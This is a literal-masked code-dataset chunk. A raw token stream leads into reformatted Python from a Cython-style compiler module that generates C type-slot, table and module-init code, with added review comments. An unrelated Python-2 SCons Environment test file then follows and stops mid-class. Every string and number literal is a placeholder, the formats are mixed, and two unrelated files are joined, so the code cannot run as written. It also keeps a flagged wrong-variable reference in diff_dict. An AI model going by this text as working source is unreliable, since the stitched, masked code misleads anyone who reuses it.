lookup_here ( "<STR_LIT>" ) <EOL> del_entry = scope . lookup_here ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> scope . mangle_internal ( "<STR_LIT>" ) ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if set_entry : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> set_entry . func_cname ) <EOL> else : <EOL> self . generate_guarded_basetype_call ( <EOL> base_type , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , code ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> '<STR_LIT>' ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if del_entry : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> del_entry . func_cname ) <EOL> else : <EOL> self . generate_guarded_basetype_call ( <EOL> base_type , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , code ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> '<STR_LIT>' ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_getattro_function ( self , scope , code ) : <EOL> def lookup_here_or_base ( n , type = None ) : <EOL> if type is None : <EOL> type = scope . parent_type <EOL> r = type . scope . lookup_here ( n ) <EOL> if r is None and type . base_type is not None : <EOL> return lookup_here_or_base ( n , type . base_type ) <EOL> else : <EOL> return r <EOL> getattr_entry = lookup_here_or_base ( "<STR_LIT>" ) <EOL> getattribute_entry = lookup_here_or_base ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" <EOL> % scope . mangle_internal ( "<STR_LIT>" ) ) <EOL> if getattribute_entry is not None : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> getattribute_entry . func_cname ) <EOL> else : <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if getattr_entry is not None : <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . 
        # NOTE(review): this chunk is a literal-masked corpus rendering (all string/number
        # literals replaced by <STR_LIT>/<NUM_LIT> placeholders). The identifiers match a
        # Cython-style compiler module-node class that emits C source via code.putln();
        # the exact emitted C text is not recoverable from this view. Indentation below is
        # reconstructed — TODO confirm against the original, unmasked file.
        #
        # Fragment: tail of a method (presumably the tp_getattro generator) whose
        # beginning lies above this chunk; its true nesting depth cannot be seen here.
        putln(
            "<STR_LIT>")
        code.putln(
            "<STR_LIT>" %
                getattr_entry.func_cname)
        code.putln(
            "<STR_LIT:}>")
        code.putln(
            "<STR_LIT>")
        code.putln(
            "<STR_LIT:}>")

    def generate_setattro_function(self, scope, code):
        # Emit the C tp_setattro slot function: dispatch to the user __setattr__ /
        # __delattr__ entries when defined, otherwise fall back to a guarded base-type call.
        base_type = scope.parent_type.base_type
        set_entry = scope.lookup_here("<STR_LIT>")
        del_entry = scope.lookup_here("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln(
            "<STR_LIT>" %
                scope.mangle_internal("<STR_LIT>"))
        # set branch (value argument non-NULL)
        code.putln(
            "<STR_LIT>")
        if set_entry:
            code.putln(
                "<STR_LIT>" %
                    set_entry.func_cname)
        else:
            self.generate_guarded_basetype_call(
                base_type, None, "<STR_LIT>", "<STR_LIT>", code)
            code.putln(
                "<STR_LIT>")
        code.putln(
            "<STR_LIT:}>")
        # delete branch
        code.putln(
            "<STR_LIT>")
        if del_entry:
            code.putln(
                "<STR_LIT>" %
                    del_entry.func_cname)
        else:
            self.generate_guarded_basetype_call(
                base_type, None, "<STR_LIT>", "<STR_LIT>", code)
            code.putln(
                "<STR_LIT>")
        code.putln(
            "<STR_LIT:}>")
        code.putln(
            "<STR_LIT:}>")

    def generate_descr_get_function(self, scope, code):
        # Emit the C tp_descr_get slot function delegating to the user __get__ entry.
        # No fallback branch: presumably only generated when __get__ is defined — confirm.
        user_get_entry = scope.lookup_here("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln(
            "<STR_LIT>" %
                scope.mangle_internal("<STR_LIT>"))
        code.putln(
            "<STR_LIT>")
        code.putln(
            "<STR_LIT>")
        code.putln(
            "<STR_LIT>")
        code.putln(
            "<STR_LIT>" %
                user_get_entry.func_cname)
        code.putln(
            "<STR_LIT>")
        code.putln(
            "<STR_LIT:}>")

    def generate_descr_set_function(self, scope, code):
        # Emit the C tp_descr_set slot function: __set__ / __delete__ dispatch with a
        # guarded base-type fallback and (masked) error raise in each missing branch.
        base_type = scope.parent_type.base_type
        user_set_entry = scope.lookup_here("<STR_LIT>")
        user_del_entry = scope.lookup_here("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln(
            "<STR_LIT>" %
                scope.mangle_internal("<STR_LIT>"))
        code.putln(
            "<STR_LIT>")
        if user_set_entry:
            code.putln(
                "<STR_LIT>" %
                    user_set_entry.func_cname)
        else:
            self.generate_guarded_basetype_call(
                base_type, None, "<STR_LIT>", "<STR_LIT>", code)
            code.putln(
                '<STR_LIT>')
            code.putln(
                "<STR_LIT>")
        code.putln(
            "<STR_LIT:}>")
        code.putln(
            "<STR_LIT>")
        if user_del_entry:
            code.putln(
                "<STR_LIT>" %
                    user_del_entry.func_cname)
        else:
            self.generate_guarded_basetype_call(
                base_type, None, "<STR_LIT>", "<STR_LIT>", code)
            code.putln(
                '<STR_LIT>')
            code.putln(
                "<STR_LIT>")
        code.putln(
            "<STR_LIT:}>")
        code.putln(
            "<STR_LIT:}>")

    def generate_property_accessors(self, cclass_scope, code):
        # For each property entry, generate getter/setter C functions as its
        # property scope defines them.
        for entry in cclass_scope.property_entries:
            property_scope = entry.scope
            if property_scope.defines_any(["<STR_LIT>"]):
                self.generate_property_get_function(entry, code)
            if property_scope.defines_any(["<STR_LIT>", "<STR_LIT>"]):
                self.generate_property_set_function(entry, code)

    def generate_property_get_function(self, property_entry, code):
        # Emit the C getter wrapper for a property; records the mangled getter_cname
        # on the entry for later use in the getset table.
        property_scope = property_entry.scope
        property_entry.getter_cname = property_scope.parent_scope.mangle(
            Naming.prop_get_prefix, property_entry.name)
        get_entry = property_scope.lookup_here("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln(
            "<STR_LIT>" %
                property_entry.getter_cname)
        code.putln(
            "<STR_LIT>" %
                get_entry.func_cname)
        code.putln(
            "<STR_LIT:}>")

    def generate_property_set_function(self, property_entry, code):
        # Emit the C setter wrapper for a property: set/delete dispatch with a (masked)
        # error raise when the corresponding __set__/__del__ entry is missing.
        property_scope = property_entry.scope
        property_entry.setter_cname = property_scope.parent_scope.mangle(
            Naming.prop_set_prefix, property_entry.name)
        set_entry = property_scope.lookup_here("<STR_LIT>")
        del_entry = property_scope.lookup_here("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln(
            "<STR_LIT>" %
                property_entry.setter_cname)
        code.putln(
            "<STR_LIT>")
        if set_entry:
            code.putln(
                "<STR_LIT>" %
                    set_entry.func_cname)
        else:
            code.putln(
                '<STR_LIT>')
            code.putln(
                "<STR_LIT>")
        code.putln(
            "<STR_LIT:}>")
        code.putln(
            "<STR_LIT>")
        if del_entry:
            code.putln(
                "<STR_LIT>" %
                    del_entry.func_cname)
        else:
            code.putln(
                '<STR_LIT>')
            code.putln(
                "<STR_LIT>")
        code.putln(
            "<STR_LIT:}>")
        code.putln(
            "<STR_LIT:}>")

    def generate_typeobj_definition(self, modname, entry, code):
        # Emit the static PyTypeObject definition for an extension type, including
        # all slot substructures and the per-slot table entries.
        type = entry.type
        scope = type.scope
        for suite in TypeSlots.substructures:
            suite.generate_substructure(scope, code)
        code.putln("<STR_LIT>")
        if entry.visibility == '<STR_LIT>':
            header = "<STR_LIT>"
        else:
            header = "<STR_LIT>"
        code.putln(header % type.typeobj_cname)
        code.putln(
            "<STR_LIT>")
        code.putln(
            '<STR_LIT>' % (
                self.full_module_name, scope.class_name))
        if type.typedef_flag:
            objstruct = type.objstruct_cname
        else:
            objstruct = "<STR_LIT>" % type.objstruct_cname
        code.putln(
            "<STR_LIT>" %
                objstruct)
        code.putln(
            "<STR_LIT>")
        for slot in TypeSlots.slot_table:
            slot.generate(scope, code)
        code.putln(
            "<STR_LIT>")

    def generate_method_table(self, env, code):
        # Emit the PyMethodDef table for the scope's Python-callable functions.
        code.putln("<STR_LIT>")
        code.putln(
            "<STR_LIT>" %
                env.method_table_cname)
        for entry in env.pyfunc_entries:
            code.put_pymethoddef(entry, "<STR_LIT:U+002C>")
        code.putln(
            "<STR_LIT>")
        code.putln(
            "<STR_LIT>")

    def generate_member_table(self, env, code):
        # Emit the PyMemberDef table for public attributes, if any; flags depend on
        # the entry's visibility.
        if env.public_attr_entries:
            code.putln("<STR_LIT>")
            code.putln(
                "<STR_LIT>" %
                    env.member_table_cname)
            type = env.parent_type
            if type.typedef_flag:
                objstruct = type.objstruct_cname
            else:
                objstruct = "<STR_LIT>" % type.objstruct_cname
            for entry in env.public_attr_entries:
                type_code = entry.type.pymemberdef_typecode
                if entry.visibility == '<STR_LIT>':
                    flags = "<STR_LIT>"
                else:
                    flags = "<STR_LIT:0>"
                code.putln('<STR_LIT>' % (
                    entry.name,
                    type_code,
                    "<STR_LIT>" % (objstruct, entry.cname),
                    flags))
            code.putln(
                "<STR_LIT>")
            code.putln(
                "<STR_LIT>")

    def generate_getset_table(self, env, code):
        # Emit the PyGetSetDef table for properties; missing getter/setter/doc
        # slots fall back to a (masked) null placeholder.
        if env.property_entries:
            code.putln("<STR_LIT>")
            code.putln(
                "<STR_LIT>" %
                    env.getset_table_cname)
            for entry in env.property_entries:
                code.putln(
                    '<STR_LIT>' % (
                        entry.name,
                        entry.getter_cname or "<STR_LIT:0>",
                        entry.setter_cname or "<STR_LIT:0>",
                        entry.doc_cname or "<STR_LIT:0>"))
            code.putln(
                "<STR_LIT>")
            code.putln(
                "<STR_LIT>")

    def generate_filename_init_prototype(self, code):
        # Emit the forward declaration of the filename-table init function.
        # NOTE(review): stray trailing semicolon below is preserved from the original.
        code.putln("<STR_LIT>");
        code.putln("<STR_LIT>" % Naming.fileinit_cname)

    def generate_import_star(self, env, code):
        # Emit the C support code for 'from module import *': a table of C type
        # names that must not be overwritten, plus a setter that converts incoming
        # Python objects into the module's C globals.
        code.putln()
        code.putln("<STR_LIT>" % Naming.import_star)
        for name, entry in env.entries.items():
            if entry.is_type:
                code.putln('<STR_LIT>' % name)
        code.putln("<STR_LIT:0>")
        code.putln("<STR_LIT>")
        code.putln()
        code.enter_cfunc_scope()
        code.putln("<STR_LIT>" % Naming.import_star_set)
        code.putln("<STR_LIT>" % Naming.import_star)
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln('<STR_LIT>')
        code.putln('<STR_LIT>')
        code.putln("<STR_LIT:}>")
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT:}>")
        old_error_label = code.new_error_label()
        code.putln("<STR_LIT>")
        for name, entry in env.entries.items():
            if entry.is_cglobal and entry.used:
                code.putln('<STR_LIT>' % name)
                if entry.type.is_pyobject:
                    # Python-object globals: optional type test, decref old value, assign.
                    if entry.type.is_extension_type or entry.type.is_builtin_type:
                        code.putln("<STR_LIT>" % (
                            entry.type.type_test_code("<STR_LIT:o>"),
                            code.error_goto(entry.pos)))
                    code.put_var_decref(entry)
                    code.putln("<STR_LIT>" % (
                        entry.cname,
                        PyrexTypes.typecast(entry.type, py_object_type, "<STR_LIT:o>")))
                elif entry.type.from_py_function:
                    # C-typed globals with a from-Python converter; enums go through
                    # an extra cast to a C integer type.
                    rhs = "<STR_LIT>" % entry.type.from_py_function
                    if entry.type.is_enum:
                        rhs = typecast(entry.type, c_long_type, rhs)
                    code.putln("<STR_LIT>" % (
                        entry.cname,
                        rhs,
                        entry.type.error_condition(entry.cname),
                        code.error_goto(entry.pos)))
                    code.putln("<STR_LIT>")
                else:
                    # No conversion available: emit a (masked) error and jump to
                    # the error label.
                    code.putln('<STR_LIT>' % (name, entry.type))
                    code.putln(code.error_goto(entry.pos))
                code.putln("<STR_LIT:}>")
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>" % Naming.module_cname)
        code.putln("<STR_LIT:}>")
        code.putln("<STR_LIT>")
        code.put_label(code.error_label)
        code.putln('<STR_LIT>' % self.full_module_name);
        code.error_label = old_error_label
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT:}>")
        code.putln(import_star_utility_code)
        code.exit_cfunc_scope()

    def generate_module_init_func(self, imported_modules, env, code):
        # Emit the C module initialisation function (both Py2 and Py3 entry-point
        # headers), driving global init, type init, imports and the module body.
        code.globalstate.insert_initcode_into(code)
        code.enter_cfunc_scope()
        code.putln("<STR_LIT>")
        header2 = "<STR_LIT>" % env.module_name
        header3 = "<STR_LIT>" % env.module_name
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>" % header2)
        code.putln(header2)
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>" % header3)
        code.putln(header3)
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT:{>")
        # Insertion point so temp declarations can be prepended later.
        tempdecl_code = code.insertion_point()
        code.putln("<STR_LIT>" % (Naming.empty_tuple, code.error_goto_if_null(Naming.empty_tuple, self.pos)));
        code.putln("<STR_LIT>")
        env.generate_library_function_declarations(code)
        self.generate_filename_init_call(code)
        code.putln("<STR_LIT>")
        code.putln(code.error_goto_if_neg("<STR_LIT>", self.pos))
        code.putln("<STR_LIT>")
        self.generate_module_creation_code(env, code)
        if Options.cache_builtins:
            code.putln("<STR_LIT>")
            code.putln(code.error_goto_if_neg("<STR_LIT>",
                self.pos))
        code.putln("<STR_LIT>" % Naming.skip_dispatch_cname);
        code.putln("<STR_LIT>")
        self.generate_global_init_code(env, code)
        code.putln("<STR_LIT>")
        self.generate_c_function_export_code(env, code)
        code.putln("<STR_LIT>")
        self.generate_type_init_code(env, code)
        code.putln("<STR_LIT>")
        for module in imported_modules:
            self.generate_type_import_code_for_module(module, env, code)
        code.putln("<STR_LIT>")
        for module in imported_modules:
            self.generate_c_function_import_code_for_module(module, env, code)
        code.putln("<STR_LIT>")
        code.mark_pos(None)
        self.body.generate_execution_code(code)
        if Options.generate_cleanup_code:
            code.putln("<STR_LIT>" % code.error_goto(self.pos))
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>" % env.module_cname)
        code.putln("<STR_LIT>")
        code.put_label(code.error_label)
        code.put_var_xdecrefs(env.temp_entries)
        code.putln('<STR_LIT>' % env.qualified_name)
        env.use_utility_code(Nodes.traceback_utility_code)
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln('<STR_LIT:}>')
        # Backfill temp declarations at the reserved insertion point.
        tempdecl_code.put_var_declarations(env.temp_entries)
        tempdecl_code.put_temp_declarations(code.funcstate)
        code.exit_cfunc_scope()

    def generate_module_cleanup_func(self, env, code):
        # Emit the optional module cleanup function; the amount of cleanup emitted
        # scales with Options.generate_cleanup_code.
        if not Options.generate_cleanup_code:
            return
        env.use_utility_code(import_module_utility_code)
        env.use_utility_code(register_cleanup_utility_code)
        code.globalstate.insert_cleanupcode_into(code)
        code.putln()
        code.putln('<STR_LIT>' % Naming.cleanup_cname)
        if Options.generate_cleanup_code >= <NUM_LIT:2>:
            # Clear module-level Python-object globals in reverse definition order.
            code.putln("<STR_LIT>")
            rev_entries = list(env.var_entries)
            rev_entries.reverse()
            for entry in rev_entries:
                if entry.visibility != '<STR_LIT>':
                    if entry.type.is_pyobject and entry.used:
                        code.put_var_decref_clear(entry)
        code.putln("<STR_LIT>")
        if Options.generate_cleanup_code >= <NUM_LIT:3>:
            code.putln("<STR_LIT>")
            for type, _ in env.types_imported.items():
                code.put_decref("<STR_LIT>" % type.typeptr_cname, PyrexTypes.py_object_type)
        if Options.cache_builtins:
            code.putln("<STR_LIT>")
            for entry in env.cached_builtins:
                code.put_var_decref_clear(entry)
        code.putln("<STR_LIT>" % (Naming.empty_tuple, Naming.empty_tuple));
        code.putln("<STR_LIT>")
        for entry in env.pynum_entries:
            code.put_var_decref_clear(entry)
        if env.all_pystring_entries:
            for entry in env.all_pystring_entries:
                if entry.is_interned:
                    code.put_decref_clear(
                        entry.pystring_cname, PyrexTypes.py_object_type)
        code.putln("<STR_LIT>")
        code.putln('<STR_LIT:}>')

    def generate_filename_init_call(self, code):
        # Emit the call to the filename-table init function.
        code.putln("<STR_LIT>" % Naming.fileinit_cname)

    def generate_pymoduledef_struct(self, env, code):
        # Emit the PyModuleDef struct used for Py3 module creation.
        if env.doc:
            doc = env.doc_cname
        else:
            doc = "<STR_LIT:0>"
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>" % Naming.pymoduledef_cname)
        code.putln("<STR_LIT>")
        code.putln('<STR_LIT>' % env.module_name)
        code.putln("<STR_LIT>" % doc)
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>" % env.method_table_cname)
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>")

    def generate_module_creation_code(self, env, code):
        # Emit the C code creating the module object (separate Py2/Py3 paths),
        # installing __builtins__ and the optional pre-import module.
        if env.doc:
            doc = env.doc_cname
        else:
            doc = "<STR_LIT:0>"
        code.putln("<STR_LIT>")
        code.putln(
            '<STR_LIT>' % (
                env.module_cname,
                env.module_name,
                env.method_table_cname,
                doc))
        code.putln("<STR_LIT>")
        code.putln(
            "<STR_LIT>" % (
                env.module_cname,
                Naming.pymoduledef_cname))
        code.putln("<STR_LIT>")
        code.putln(
            "<STR_LIT>" % (
                env.module_cname,
                code.error_goto(self.pos)));
        code.putln("<STR_LIT>")
        code.putln(
            "<STR_LIT>" %
                env.module_cname)
        code.putln("<STR_LIT>")
        code.putln(
            '<STR_LIT>' %
                Naming.builtins_cname)
        code.putln(
            "<STR_LIT>" % (
                Naming.builtins_cname,
                code.error_goto(self.pos)));
        code.putln(
            '<STR_LIT>' % (
                env.module_cname,
                Naming.builtins_cname,
                code.error_goto(self.pos)))
        if Options.pre_import is not None:
            code.putln(
                '<STR_LIT>' % (
                    Naming.preimport_cname,
                    Options.pre_import))
            code.putln(
                "<STR_LIT>" % (
                    Naming.preimport_cname,
                    code.error_goto(self.pos)));

    def generate_global_init_code(self, env, code):
        # Initialise every used Python-object module global to None.
        for entry in env.var_entries:
            if entry.visibility != '<STR_LIT>':
                if entry.type.is_pyobject and entry.used:
                    code.put_init_var_to_py_none(entry)

    def generate_c_function_export_code(self, env, code):
        # Emit export calls for C functions shared via the module's C API.
        for entry in env.cfunc_entries:
            if entry.api or entry.defined_in_pxd:
                env.use_utility_code(function_export_utility_code)
                signature = entry.type.signature_string()
                code.putln('<STR_LIT>' % (
                    entry.name,
                    entry.cname,
                    signature,
                    code.error_goto(self.pos)))

    def generate_type_import_code_for_module(self, module, env, code):
        # Import extension types declared in another module's .pxd.
        for entry in module.c_class_entries:
            if entry.defined_in_pxd:
                self.generate_type_import_code(env, entry.type, entry.pos, code)

    def generate_c_function_import_code_for_module(self, module, env, code):
        # Import C functions declared in another module's .pxd via its C API dict.
        entries = []
        for entry in module.cfunc_entries:
            if entry.defined_in_pxd:
                entries.append(entry)
        if entries:
            env.use_utility_code(import_module_utility_code)
            env.use_utility_code(function_import_utility_code)
            temp = self.module_temp_cname
            code.putln(
                '<STR_LIT>' % (
                    temp,
                    module.qualified_name,
                    temp,
                    code.error_goto(self.pos)))
            for entry in entries:
                code.putln(
                    '<STR_LIT>' % (
                        temp,
                        entry.name,
                        entry.cname,
                        entry.type.signature_string(),
                        code.error_goto(self.pos)))
            code.putln("<STR_LIT>" % (temp, temp))

    def generate_type_init_code(self, env, code):
        # Either import an externally-defined extension type, or fully initialise
        # a locally-defined one (vtable, PyType_Ready, typeptr assignment).
        for entry in env.c_class_entries:
            if entry.visibility == '<STR_LIT>':
                self.generate_type_import_code(env, entry.type, entry.pos, code)
            else:
                self.generate_base_type_import_code(env, entry, code)
                self.generate_exttype_vtable_init_code(entry, code)
                self.generate_type_ready_code(env, entry, code)
                self.generate_typeptr_assignment_code(entry, code)

    def generate_base_type_import_code(self, env, entry, code):
        # Import the base type when it lives in a different module.
        base_type = entry.type.base_type
        if base_type and base_type.module_name != env.qualified_name:
            self.generate_type_import_code(env, base_type, self.pos, code)

    def use_type_import_utility_code(self, env):
        env.use_utility_code(type_import_utility_code)
        env.use_utility_code(import_module_utility_code)

    def generate_type_import_code(self, env, type, pos, code):
        # Import an extension type once per module; also fetch its vtable pointer
        # when present. types_imported acts as the dedup cache.
        if type in env.types_imported:
            return
        if type.typedef_flag:
            objstruct = type.objstruct_cname
        else:
            objstruct = "<STR_LIT>" % type.objstruct_cname
        self.generate_type_import_call(type, code,
            code.error_goto_if_null(type.typeptr_cname, pos))
        self.use_type_import_utility_code(env)
        if type.vtabptr_cname:
            code.putln(
                "<STR_LIT>" % (
                    type.typeptr_cname,
                    type.vtabptr_cname,
                    code.error_goto(pos)))
            env.use_utility_code(Nodes.get_vtable_utility_code)
        env.types_imported[type] = <NUM_LIT:1>

    # Mapping of builtin type names whose spelling differs between Py2 and Py3
    # (masked here; presumably str/bytes-style renames — confirm).
    py3_type_name_map = {'<STR_LIT:str>': '<STR_LIT>', '<STR_LIT>': '<STR_LIT:str>'}

    def generate_type_import_call(self, type, code, error_code):
        # Emit the __Pyx_ImportType-style call, with a Py3-conditional variant when
        # the type name differs between Python major versions.
        if type.typedef_flag:
            objstruct = type.objstruct_cname
        else:
            objstruct = "<STR_LIT>" % type.objstruct_cname
        module_name = type.module_name
        if module_name not in ('<STR_LIT>', '<STR_LIT>'):
            module_name = '<STR_LIT>' % module_name
        else:
            module_name = '<STR_LIT>'
        if type.name in self.py3_type_name_map:
            code.putln("<STR_LIT>")
            code.putln('<STR_LIT>' % (
                type.typeptr_cname,
                module_name,
                self.py3_type_name_map[type.name],
                objstruct,
                error_code))
            code.putln("<STR_LIT>")
        code.putln('<STR_LIT>' % (
            type.typeptr_cname,
            module_name,
            type.name,
            objstruct,
            error_code))
        if type.name in self.py3_type_name_map:
            code.putln("<STR_LIT>")

    def generate_type_ready_code(self, env, entry, code):
        # Emit PyType_Ready plus vtable installation, module attribute binding and
        # __weakref__ offset wiring for a locally-defined extension type.
        type = entry.type
        typeobj_cname = type.typeobj_cname
        scope = type.scope
        if scope:
            if entry.visibility != '<STR_LIT>':
                for slot in TypeSlots.slot_table:
                    slot.generate_dynamic_init_code(scope, code)
                code.putln(
                    "<STR_LIT>" % (
                        typeobj_cname,
                        code.error_goto(entry.pos)))
                if type.vtable_cname:
                    code.putln(
                        "<STR_LIT>" % (
                            typeobj_cname,
                            type.vtabptr_cname,
                            code.error_goto(entry.pos)))
                    env.use_utility_code(Nodes.set_vtable_utility_code)
                code.putln(
                    '<STR_LIT>' % (
                        Naming.module_cname,
                        scope.class_name,
                        typeobj_cname,
                        code.error_goto(entry.pos)))
                weakref_entry = scope.lookup_here("<STR_LIT>")
                if weakref_entry:
                    if weakref_entry.type is py_object_type:
                        tp_weaklistoffset = "<STR_LIT>" % typeobj_cname
                        code.putln("<STR_LIT>" % (
                            tp_weaklistoffset,
                            tp_weaklistoffset,
                            type.objstruct_cname,
                            weakref_entry.cname))
                    else:
                        error(weakref_entry.pos, "<STR_LIT>")

    def generate_exttype_vtable_init_code(self, entry, code):
        # Fill in the extension type's C vtable: copy the base vtable first,
        # then install this type's own C method pointers.
        type = entry.type
        if type.vtable_cname:
            code.putln(
                "<STR_LIT>" % (
                    type.vtabptr_cname,
                    type.vtable_cname))
            if type.base_type and type.base_type.vtabptr_cname:
                code.putln(
                    "<STR_LIT>" % (
                        type.vtable_cname,
                        Naming.obj_base_cname,
                        type.base_type.vtabptr_cname))
            for meth_entry in type.scope.cfunc_entries:
                if meth_entry.func_cname:
                    code.putln(
                        "<STR_LIT>" % (
                            type.vtable_cname,
                            meth_entry.cname,
                            meth_entry.func_cname))

    def generate_typeptr_assignment_code(self, entry, code):
        # Point the type's typeptr at the statically-defined type object.
        type = entry.type
        if type.typeobj_cname:
            code.putln(
                "<STR_LIT>" % (
                    type.typeptr_cname, type.typeobj_cname))

    def generate_utility_functions(self, env, code, h_code):
        # Emit all collected utility code (protos to the header, defs to the body)
        # plus the filename-table init function and type conversion helpers.
        for codetup, name in env.utility_code_list:
            code.globalstate.use_utility_code(codetup, name)
        code.globalstate.put_utility_code_protos(h_code)
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>")
        code.putln("<STR_LIT>" % Naming.fileinit_cname)
        code.putln("<STR_LIT>" %
            (Naming.filetable_cname, Naming.filenames_cname))
        code.putln("<STR_LIT:}>")
        code.globalstate.put_utility_code_defs(code)
        code.put(PyrexTypes.type_conversion_functions)
        code.putln("<STR_LIT>")

# Module-level utility-code constants referenced by the methods above.
# All proto/impl bodies are masked C source snippets.
builtin_module_name_utility_code = UtilityCode(
    proto="""<STR_LIT>""")
import_module_utility_code = UtilityCode(
    proto="""<STR_LIT>""",
    impl="""<STR_LIT>""")
type_import_utility_code = UtilityCode(
    proto="""<STR_LIT>""",
    impl="""<STR_LIT>""")
function_export_utility_code = UtilityCode(
    proto="""<STR_LIT>""",
    impl=r"""<STR_LIT>""" % {'<STR_LIT>': Naming.module_cname, '<STR_LIT>': Naming.api_name}
)
function_import_utility_code = UtilityCode(
    proto="""<STR_LIT>""",
    impl="""<STR_LIT>""" % dict(API=Naming.api_name)
)
register_cleanup_utility_code = UtilityCode(
    proto="""<STR_LIT>""",
    impl="""<STR_LIT>""")
import_star_utility_code = """<STR_LIT>""" % {'<STR_LIT>': Naming.import_star,
    '<STR_LIT>': Naming.import_star_set}
# NOTE(review): second concatenated file in this chunk — a literal-masked,
# Python-2-era SCons Environment test module (apply(), has_key(), string.split(),
# __cmp__/__coerce__). Literal values are placeholders; indentation reconstructed.
__revision__ = "<STR_LIT>"

import copy
import os
import string
import StringIO
import sys
import TestCmd
import unittest
import UserList

from SCons.Environment import *
import SCons.Warnings

def diff_env(env1, env2):
    # Build a two-part textual diff of the keys/values of two environments,
    # suitable for an assertion failure message.
    s1 = "<STR_LIT>"
    s2 = "<STR_LIT>"
    d = {}
    for k in env1._dict.keys() + env2._dict.keys():
        d[k] = None
    keys = d.keys()
    keys.sort()
    for k in keys:
        if env1.has_key(k):
            if env2.has_key(k):
                if env1[k] != env2[k]:
                    s1 = s1 + "<STR_LIT:U+0020>" + repr(k) + "<STR_LIT>" + repr(env1[k]) + "<STR_LIT:\n>"
                    s2 = s2 + "<STR_LIT:U+0020>" + repr(k) + "<STR_LIT>" + repr(env2[k]) + "<STR_LIT:\n>"
            else:
                s1 = s1 + "<STR_LIT:U+0020>" + repr(k) + "<STR_LIT>" + repr(env1[k]) + "<STR_LIT:\n>"
        elif env2.has_key(k):
            s2 = s2 + "<STR_LIT:U+0020>" + repr(k) + "<STR_LIT>" + repr(env2[k]) + "<STR_LIT:\n>"
    s1 = s1 + "<STR_LIT>"
    s2 = s2 + "<STR_LIT>"
    return s1 + s2

def diff_dict(d1, d2):
    # Same diff as diff_env but for plain dicts.
    s1 = "<STR_LIT>"
    s2 = "<STR_LIT>"
    d = {}
    for k in d1.keys() + d2.keys():
        d[k] = None
    keys = d.keys()
    keys.sort()
    for k in keys:
        if d1.has_key(k):
            if d2.has_key(k):
                if d1[k] != d2[k]:
                    s1 = s1 + "<STR_LIT:U+0020>" + repr(k) + "<STR_LIT>" + repr(d1[k]) + "<STR_LIT:\n>"
                    s2 = s2 + "<STR_LIT:U+0020>" + repr(k) + "<STR_LIT>" + repr(d2[k]) + "<STR_LIT:\n>"
            else:
                s1 = s1 + "<STR_LIT:U+0020>" + repr(k) + "<STR_LIT>" + repr(d1[k]) + "<STR_LIT:\n>"
        # BUG(review): this tests 'env2', not 'd2' — copy/paste from diff_env.
        # 'env2' is undefined here, so this branch would raise NameError if ever
        # reached with a key only in d2. Should be: elif d2.has_key(k):
        elif env2.has_key(k):
            s2 = s2 + "<STR_LIT:U+0020>" + repr(k) + "<STR_LIT>" + repr(d2[k]) + "<STR_LIT:\n>"
    s1 = s1 + "<STR_LIT>"
    s2 = s2 + "<STR_LIT>"
    return s1 + s2

# Globals recording what the stub Builder/Scanner classes were called with.
called_it = {}
built_it = {}

class Builder:
    """<STR_LIT>"""
    # Stub builder: records call arguments in the module-level dicts above.
    def __init__(self, name=None):
        self.name = name
    def __call__(self, env, target=None, source=None, **kw):
        global called_it
        called_it['<STR_LIT:target>'] = target
        called_it['<STR_LIT:source>'] = source
        called_it.update(kw)
    def execute(self, target=None, **kw):
        global built_it
        built_it[target] = <NUM_LIT:1>

scanned_it = {}

class Scanner:
    """<STR_LIT>"""
    # Stub scanner: records scanned filenames; compares by __dict__ (Py2 __cmp__).
    def __init__(self, name, skeys=[]):
        self.name = name
        self.skeys = skeys
    def __call__(self, filename):
        global scanned_it
        scanned_it[filename] = <NUM_LIT:1>
    def __cmp__(self, other):
        try:
            return cmp(self.__dict__, other.__dict__)
        except AttributeError:
            return <NUM_LIT:1>
    def get_skeys(self, env):
        return self.skeys
    def __str__(self):
        return self.name

class CLVar(UserList.UserList):
    # Command-line-variable list stub: splits strings into word lists and keeps
    # list semantics for + (both sides coerced to CLVar).
